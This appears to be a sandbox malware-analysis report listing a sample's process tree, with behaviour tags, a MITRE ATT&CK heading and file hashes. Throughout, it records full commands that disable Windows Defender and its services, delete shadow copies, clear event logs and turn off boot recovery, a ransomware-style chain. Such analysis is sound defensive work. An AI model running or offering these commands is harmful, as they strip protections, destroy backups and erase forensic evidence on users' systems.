C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1496
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1632
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:364
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:964
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1976
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1816
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:812
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1564
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:436
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1932
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:972
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1288
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1708
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1092
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1544
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1736
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1052
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1648
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1760
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1380
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:876
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1972
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:960
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1276
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1396
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:320
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:292
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1068
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:836
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:912
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:936
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1180
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:864
-
-
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1548
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1540
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1532
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1684
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2076
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2096
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5aba76d4d8ba68ac352dfe8cc3d558867
SHA19b5bbb35c6f0f6aeb158a23be6605173f6071b94
SHA256c0b979d13ecc17baac51b0496d17c167e2c1ea9caad602568d7c946cec0430a9
SHA5129194a2b4c2a3587e53c7983a2e521490cc0abe3a5eafa889a2854f3c633049987a3bf8637b5e121dbd05bb83cb4b595c1f8c52bb92756ba4dd065d4f34e7580f